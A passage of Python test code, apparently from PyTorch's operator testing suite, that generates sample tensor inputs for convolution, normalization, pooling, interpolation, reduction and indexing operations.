requires_grad=requires_grad) cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((2, 1, 4, 5), {'p': 1., 'dim': 2}), ((2, 3, 4, 5), {'p': 2., 'dim': 1}), ((1, 2, 4, 5), {'p': 0.5, 'dim': 0}), ((1, 3, 4, 5), {'p': -1., 'dim': 1}), ((1, 3, 4, 5), {'p': 0., 'dim': -1}), ((), {'p': 1.2, 'dim': 0}), ((2, 3, 4, 5), {}), ((2, 3, 4, 5), {'eps': 1e-4})) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), kwargs=kwargs) def sample_inputs_conv_transpose1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'output_padding': (1,), 'groups': 1}), ((2, 2, 4), (2, 2, 4), (4,), {'stride': (3,), 'padding': (1,), 'output_padding': (2,), 'groups': 2, 'dilation': (4,)}), ((1, 1, 4), (1, 1, 4), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2,)}), ((1, 1, 4), (1, 2, 3), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5), (4, 8, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv_transpose2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4, 4), (3, 3, 3, 3), (3,), {'stride': (2, 2), 'padding': 2, 'output_padding': (1, 1), 'groups': 1}), ((2, 2, 4, 4), (2, 2, 4, 5), (4,), {'stride': (3, 2), 'padding': (1, 2), 'output_padding': (2, 3), 'groups': 2, 'dilation': (4, 4)}), ((1, 1, 4, 5), (1, 1, 4, 3), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 1, 4, 3), (1, 2, 3, 4), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5, 5), (4, 8, 3, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv_transpose3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4, 4, 4), (3, 3, 3, 3, 3), (3,), {'stride': (2, 2, 2), 'padding': 2, 'output_padding': (1, 1, 1), 'groups': 1}), ((2, 2, 4, 4, 4), (2, 2, 4, 5, 6), (4,), {'stride': (3, 2, 1), 'padding': (1, 2, 3), 'output_padding': (2, 3, 1), 'groups': 2, 'dilation': (4, 4, 4)}), ((1, 1, 4, 5, 2), (1, 1, 4, 3, 1), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3, 2)}), ((1, 1, 4, 3, 4), (1, 2, 3, 4, 5), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5, 5, 5), (4, 8, 3, 3, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias, # and a dict of values of (stride, padding, dilation, groups) cases: Tuple = ( ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'groups': 1}), ((2, 4, 8), (2, 2, 3), (2,), {'stride': 3, 'padding': 1, 'groups': 2, 'dilation': 2}), ((1, 4, 5), (1, 4, 3), None, {'stride': (2,), 'padding': 'valid'}), ((2, 2, 4), (2, 1, 4), (2,), {'stride': (1,), 'padding': 'same', 'groups': 2, 'dilation': (2,)}), # With defaults ((1, 4, 5), (3, 4, 3), None, {}), ) # TODO: (@krshrimali), add error_inputs_func once https://github.com/pytorch/pytorch/pull/67354 is merged # Should replace test_conv_modules_raise_error_on_incorrect_input_size and test_conv_shapecheck # in test/test_nn.py for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv2d(op_info, device, dtype, requires_grad, jit_fail_sample=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, groups, dilation) cases: Tuple = ( ((1, 3, 4, 4), (3, 3, 3, 3), (3,), {'stride': (2, 2), 'padding': 2, 'groups': 1}), ((2, 4, 8, 8), (2, 2, 3, 3), (2,), {'stride': (3, 2), 'padding': (2, 1), 'groups': 2, 'dilation': (4, 4)}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 2, 4, 3), (4, 2, 3, 4), None, {'stride': 2, 'padding': 1, 'groups': 1}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': "valid"}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 1, 'padding': "same", 'dilation': 3}), # Below are the group related samples from common_nn.py ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4}), ((2, 4, 6, 6), (8, 1, 3, 3), (8,), {'groups': 4}), ((2, 4, 6, 6), (8, 1, 3, 3), None, {'groups': 4}), ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'stride': (3, 2)}), ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'padding': (1, 1)}), ((2, 4, 5, 5), (4, 1, 2, 2), (4,), {'groups': 4, 'dilation': (2, 2)}), ((2, 4, 6, 5), (6, 2, 3, 2), (6,), {'groups': 2}), # With defaults ((1, 4, 5, 5), (3, 4, 3, 3), None, {}), ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_group_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, num groups, and eps cases: Tuple[Tuple[int], int, float] = ( # type: ignore[assignment] ((1, 6, 3), 2, 0.5), ((2, 6, 3), 2, -0.5), ((1, 2), 1, None), ((0, 2), 1, None), ) for input_shape, num_groups, eps in cases: # Shape of weight and bias should be the same as num_channels weight = make_arg(input_shape[1]) bias = make_arg(input_shape[1]) kwargs = {'weight': weight, 'bias': bias} if eps is None else {'weight': weight, 'bias': bias, 'eps': eps} yield SampleInput( make_arg(input_shape), args=(num_groups,), kwargs=kwargs ) # Without any optional args yield SampleInput(make_arg((1, 2)), args=(1,)) def sample_inputs_instance_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'momentum': 0.5, 'eps': 0.6}), ((S, S, S), {'momentum': 0.5, 'eps': 0.6, 'use_input_stats': True}), ((3, 2, 4), {'momentum': -1.2}), ((3, 2, 4), {'momentum': 0.0}), ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] weight = make_arg(channels) bias = make_arg(channels) running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) new_kwargs = { 'running_mean': running_mean, 'running_var': running_var, 'weight': weight, 'bias': bias, **kwargs } yield SampleInput( make_arg(input_shape), args=(), kwargs=new_kwargs ) # Checking for permutations of weights and biases as `None` # instance_norm assumes that if there's a bias, there's a weight weights = [channels, None] biases = [None, None] for weight_channels, bias_channels in zip(weights, biases): running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=(), kwargs={ 'running_mean': running_mean, 'running_var': running_var, 'weight': make_arg(weight_channels) if weight_channels is not None else None, 'bias': make_arg(bias_channels) if bias_channels is not None else None } ) # Test case for no optional kwargs yield SampleInput(make_arg((1, 2, 3)), kwargs={}) def sample_inputs_layer_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, normalized_shape and a kwarg dict for eps cases: Tuple[Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 2, 3), (1, 2, 3), {'eps': 0.5}), ((2, 2, 3), (2, 3), {'eps': -0.5}), ((1,), (1,), {}), ((1, 2), (2,), {}), ((0, 1), (1,), {}), ) for input_shape, normalized_shape, kwargs in cases: # Shape of weight and bias should be the same as normalized_shape weight = make_arg(normalized_shape) bias = make_arg(normalized_shape) yield SampleInput( make_arg(input_shape), args=(normalized_shape, weight, bias), kwargs=kwargs ) # Without any optional args yield SampleInput(make_arg((1, 2)), args=((2,),)) # TODO: @krshrimali, once to_numpy method in SampleInput class is modified to take None inputs, # enable these inputs; see https://github.com/pytorch/pytorch/pull/63276#discussion_r691950400 # With weight and a `None` bias # yield SampleInput(make_arg((1, 2)), args=((2,), make_arg((2,)), None)) # With `None` weight and bias (tests failing for this, see the link above) # yield SampleInput(make_arg((1, 2)), args=((2,), None, make_arg((2,)))) def sample_inputs_local_response_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, size and a kwarg dict for alpha, beta, and k cases: Tuple[Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((1, 6, 3), 2, {'beta': 0.5, 'k': 1.25}), ((1, 6, 3), 2, {'alpha': 3e-05, 'k': 1.25}), ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5}), ((1, 6, 3), 2, {'alpha': 3e-05}), ((1, 6, 3), 2, {'beta': 0.5}), ((1, 6, 3), 2, {'k': 1.25}), ((1, 6, 3), 2, {}), ((2, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((1, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((0, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ) for input_shape, size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(size,), kwargs=kwargs) def sample_inputs_hardswish(self, device, dtype, requires_grad, **kwargs): N = 5 # make sure we are testing -3 -> 3 range. default is -10 -> 10 so maybe unnecessary ? tensors = [SampleInput(make_tensor((N * 2, N * 2), device=device, dtype=dtype, requires_grad=requires_grad, low=-5, high=5)) for _ in range(1, N)] return tensors def sample_inputs_linear(self, device, dtype, requires_grad, **kwargs): features_options = [[3, 4], [8, 8]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for has_bias, (in_feat, out_feat), batch_shape in \ itertools.product([True, False], features_options, batch_options): input_tensor = create_tensor(batch_shape + [in_feat]) weight = create_tensor([out_feat, in_feat]) if not has_bias: sample_inputs.append(SampleInput(input_tensor, args=(weight,))) continue bias = create_tensor([out_feat]) sample_inputs.append(SampleInput(input_tensor, args=(weight, bias))) return sample_inputs def sample_inputs_bilinear(self, device, dtype, requires_grad, **kwargs): features_options = [[3, 4, 5], [8, 8, 8]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for has_bias, (in_feat1, in_feat2, out_feat), batch_shape in \ itertools.product([True, False], features_options, batch_options): input_tensor1 = create_tensor(batch_shape + [in_feat1]) input_tensor2 = create_tensor(batch_shape + [in_feat2]) weight = create_tensor([out_feat, in_feat1, in_feat2]) if not has_bias: sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight,))) continue bias = create_tensor([out_feat]) sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight, bias))) return sample_inputs def sample_inputs_glu(self, device, dtype, requires_grad, **kwargs): features_options = [[2], [2, 4], [8, 8], [3, 6, 8], [1, 4, 6, 7]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for features, batch_shape in itertools.product(features_options, batch_options): ndim = len(features) + len(batch_shape) for dim in range(ndim): input_tensor = create_tensor(batch_shape + features) dim_size = input_tensor.size(dim) if dim_size > 0 and dim_size % 2 == 0: sample_inputs.append(SampleInput(input_tensor, args=(dim,))) return sample_inputs def sample_inputs_interpolate(mode, self, device, dtype, requires_grad, **kwargs): N, C = 2, 3 D = 4 S = 3 L = 5 align_corners_options: Tuple[Any, ...] = (None,) if mode in ('linear', 'bilinear', 'bicubic', 'trilinear'): align_corners_options = (True, False, None) ranks_for_mode = { 'nearest': [1, 2, 3], 'linear': [1], 'bilinear': [2], 'bicubic': [2], 'trilinear': [3], 'area': [1, 2, 3] } def shape(size, rank, with_batch_channel=True): if with_batch_channel: return tuple([N, C] + ([size] * rank)) return tuple([size] * rank) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-1, high=1) sample_inputs = [] for align_corners in align_corners_options: for rank in ranks_for_mode[mode]: sample_inputs.extend([ SampleInput(make_arg(shape(D, rank)), args=(shape(S, rank, False), None, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(shape(L, rank, False), None, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(None, 1.7, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(None, 0.6, mode, align_corners)), ]) return sample_inputs def sample_inputs_upsample(mode, self, device, dtype, requires_grad, **kwargs): N, C = 2, 3 D = 4 S = 3 L = 5 ranks_for_mode = { 'nearest': [1, 2, 3], 'bilinear': [2], } def shape(size, rank, with_batch_channel=True): if with_batch_channel: return tuple([N, C] + ([size] * rank)) return tuple([size] * rank) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-1, high=1) sample_inputs = [] for rank in ranks_for_mode[mode]: sample_inputs.extend([ SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(S, rank, False))), SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(L, rank, False))), SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=1.7)), SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=0.6)), ]) return sample_inputs def sample_inputs_gelu(self, device, dtype, requires_grad, **kwargs): N = 5 tensors = [] for _ in range(1, N): for approximate in ['none', 'tanh']: tensors.append(SampleInput( make_tensor((N * 2, N * 2), device=device, dtype=dtype, requires_grad=requires_grad, low=-3, high=3), kwargs=dict(approximate=approximate))) return tensors def sample_inputs_max_min_reduction_with_dim(op_info, device, dtype, requires_grad, **kwargs): inputs = [] args_for_reduction_with_dim = ( ((S, S, S), (1,),), ((S, S, S), (1, True, ),), ((), (0,),), ((), (0, True,),), ) inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=args,)) for input_tensor, args in args_for_reduction_with_dim) return inputs def sample_inputs_max_min_reduction_no_dim(op_info, device, dtype, requires_grad, **kwargs): inputs = [] inputs.append(SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)) inputs.append(SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)) return inputs def _generate_nan_reduction_inputs(device, dtype, requires_grad, **kwargs): yield from _generate_reduction_inputs(device, dtype, requires_grad) yield torch.tensor([2, torch.nan, -1], device=device, dtype=dtype, requires_grad=requires_grad) yield torch.tensor([[torch.nan, 2], [0, 1]], device=device, dtype=dtype, requires_grad=requires_grad) def sample_inputs_nan_reduction(supports_multiple_dims): # Generates sample inputs for reduction ops that contain the input tensor # and dim and keepdim kwargs. If a reduction op needs to test additional # args/kwargs then create a separate sample_inputs function def fn(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_nan_reduction_inputs(device, dtype, requires_grad): # Add case without dim and keepdim kwargs inputs.append(SampleInput(t.clone().requires_grad_(requires_grad))) for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs=kwargs)) return inputs return fn def sample_inputs_reduction_quantile(op_info, device, dtype, requires_grad, **kwargs): test_quantiles = (0.5, make_tensor((2,), dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad)) test_interpolations = ['linear', 'midpoint'] inputs = [] for quantiles in test_quantiles: for t in _generate_reduction_inputs(device, dtype, requires_grad): # Add case without dim and keepdim kwargs inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), args=(quantiles,))) for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims=False): # Interpolation kwarg for now is only supported when providing both dim and keepdim kwargs.setdefault('dim', 0) kwargs.setdefault('keepdim', False) for interpolation in test_interpolations: kwargs['interpolation'] = interpolation inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), args=(quantiles,), kwargs=kwargs)) return inputs def sample_inputs_reduction_count_nonzero(*args, **kwargs): """Sample inputs for count_nonzero""" # count_nonzero does not support keepdim yet for sample in sample_inputs_reduction(*args, **kwargs): sample.kwargs.pop('keepdim', None) yield sample def sample_inputs_leaky_relu(op_info, device, dtype, requires_grad, **kwargs): N = 10 tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype, requires_grad=requires_grad)) for _ in range(1, N)] return tensors def sample_inputs_fractional_max_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size cases = (((1, 3, 9, 9), 3), ((1, 3, 9, 9), (4, 4)), ((1, 3, 9, 9), (6, 6)), ((2, 3, 9, 9), (3, 3)), ((1, 1, 4, 4), (2, 2)), ((1, 2, 6, 6), (4, 4))) samples = [] for input_shape, kernel_size in cases: for return_indices in [False, True]: # test case passing a single output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2), return_indices=return_indices) )) # test case passing a tuple output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2, 3), return_indices=return_indices) )) # test case passing an output ratio samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_ratio=(0.5, 0.5), return_indices=return_indices) )) return samples def sample_inputs_fractional_max_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size cases = (((2, 3, 5, 5, 5), (2, 2, 2)), ((1, 2, 6, 5, 4), 2), ((1, 2, 5, 6, 5), (2, 3, 2)), ((1, 2, 6, 6, 6), (2, 3, 2)), ((1, 1, 7, 6, 7), (2, 3, 4)), ((1, 1, 4, 5, 4), (2, 2, 1)), ((1, 1, 8, 7, 6), (4, 3, 2)), ((0, 1, 4, 5, 4), (2, 2, 1))) samples = [] for input_shape, kernel_size in cases: for return_indices in [False, True]: # test case passing a single output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2), return_indices=return_indices) )) # test case passing a tuple output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2, 3, 2), return_indices=return_indices) )) # test case passing an output ratio samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_ratio=(0.5, 0.5, 0.5), return_indices=return_indices) )) return samples def sample_inputs_avgpool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override cases = (((1, 3, 9, 9), 3, 1, 1, True, False, 2), ((1, 3, 9, 9), (4, 4), (2, 3), 1, True, False, 2), ((1, 3, 9, 9), (6, 6), (3, 3), (2, 3), True, True, 2), ((2, 3, 9, 9), (3, 3), (1, 1), (1, ), True, False, 2), ((1, 1, 4, 4), (2, 2), (), (0, ), False, True, -2), ((1, 2, 6, 6), (4, 4), (2, 2), (2, ), True, True, None)) for input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override)) # Case with just input_shape and kernel_size yield SampleInput(make_arg((1, 3, 9, 9)), args=((3, 3))) def sample_inputs_avgpool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, kwargs cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [ ((2, 3, 9), (3,), dict()), ((1, 3, 9), 3, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False)), ((1, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=True, count_include_pad=True)), ((2, 3, 9), (3,), dict(stride=(1,), padding=(1,), ceil_mode=False, count_include_pad=True)), ((0, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=False, count_include_pad=True)), ((1, 2, 9), (7,), dict(stride=(3,), padding=(2,), ceil_mode=False)), ((1, 2, 9), (7,), dict(stride=(3,), padding=(3,), ceil_mode=True)), ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=False)), ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=True)), ] for input_shape, kernel_size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs) def sample_inputs_avgpool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [ ((2, 3, 3, 4, 4), (2, 2, 2), dict()), ((1, 2, 4, 4, 4), 2, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False, divisor_override=2)), ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=True, count_include_pad=True, divisor_override=2)), ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=False)), ((1, 1, 7, 5, 7), (6, 3, 4), dict(stride=(2, 3, 2), padding=(3, 1, 0), ceil_mode=False, count_include_pad=False, divisor_override=2)), ((1, 1, 4, 5, 4), (2, 2, 3), dict(stride=(2, 2, 1), padding=0, ceil_mode=False, count_include_pad=True, divisor_override=-2)), ((1, 1, 6, 5, 6), (4, 5, 6), dict(stride=(2, 3, 2), padding=2, ceil_mode=True, count_include_pad=True, divisor_override=None)), ((0, 1, 4, 5, 4), (2, 3, 1), dict(stride=(2, 1, 2), padding=0, ceil_mode=False, count_include_pad=True, divisor_override=None)), ] for input_shape, kernel_size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs) def sample_inputs_topk(op_info, device, dtype, requires_grad, **kwargs): def get_tensor_input(size): return make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3,))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1,))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True, True))) return inputs def sample_inputs_outer(op_info, device, dtype, requires_grad, **kwargs): inputs = [] arg_a = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) arg_b = make_tensor((M,), dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(arg_a, args=(arg_b,))) return inputs def sample_inputs_dist(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) sizes = ((S, S, S), (S,), (S, 1, S), (), (S, S)) ps = (2, 4) for size_x, size_y, p in product(sizes, sizes, ps): yield SampleInput(make_arg(size_x), args=(make_arg(size_y), p)) # Missing to test the nondeterminism of the operation # https://github.com/pytorch/pytorch/issues/53352 def sample_inputs_index(op_info, device, dtype, requires_grad, **kwargs): # target.index_select(dim, idx) select = op_info.name == "index_select" # target.index_add(dim, idx, source, *, alpha=1) add = op_info.name == "index_add" # target.index_copy(dim, idx, source) copy = op_info.name == "index_copy" # target.index_fill(dim, idx, value) fill = op_info.name == "index_fill" make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_permutation = partial(torch.randperm, device=device, dtype=torch.int64) def make_idx(n): return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=n) shapes = [(), (1,), (S, S)] # extra parameter for add alphas = (-1, 0, 2) if add else (None,) for shape, alpha in product(shapes, alphas): t = make_arg(shape) args = [] # dim. We handle the scalar case dim = 1 if t.ndim == 2 else 0 args.append(dim) # idx They need to be different for copy and add to be deterministic make_idx_fn = make_permutation if copy or add else make_idx idx = make_idx_fn(t.shape[dim] if t.ndim != 0 else 1) args.append(idx) # source if copy or add: args.append(make_arg(shape)) elif fill: # A weird number to catch errors args.append(make_arg((1,)).item()) args = tuple(args) kwargs = {} if alpha is None else {"alpha": alpha} yield SampleInput(t, args=args, kwargs=kwargs) def sample_inputs_index_reduce(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_idx(n, m): return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=m) shapes = [((), ()), ((1,), (1,)), ((S, S), (S, M)), ((S, S, S), (S, M, S))] include_selfs = (True, False) reduces = ('prod', 'mean', 'amin', 'amax') for shape, include_self, reduce in product(shapes, include_selfs, reduces): self_shape, src_shape = shape # dim. We handle the scalar case dim = 1 if len(self_shape) >= 2 else 0 idx = make_idx(src_shape[dim] if len(src_shape) != 0 else 1, self_shape[dim] if len(self_shape) != 0 else 1) args = (dim, idx, make_arg(src_shape), reduce) yield SampleInput(make_arg(self_shape), args=args, kwargs={'include_self' : include_self}) # Sample inputs to test edge cases for backward if requires_grad: # Check that gradients are propagated correctly for prod when zeros in self/src are reduced # This sample tests gradients for the following cases # (a) 1 zero reduced (from source (self[0, 1]), from self (self[0, 0])) # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0], self[1, 1]) # (c) no zeros reduced (self[2, 1], self[2, 2]) # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py # test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad input = torch.tensor([[0, 13], [0, 0], [15, 19]], dtype=dtype, device=device, requires_grad=requires_grad) src = torch.tensor([[2, 0], [0, 0], [2, 3], [2, 2]], dtype=dtype, device=device, requires_grad=requires_grad) idx = torch.tensor([0, 1, 2, 0], 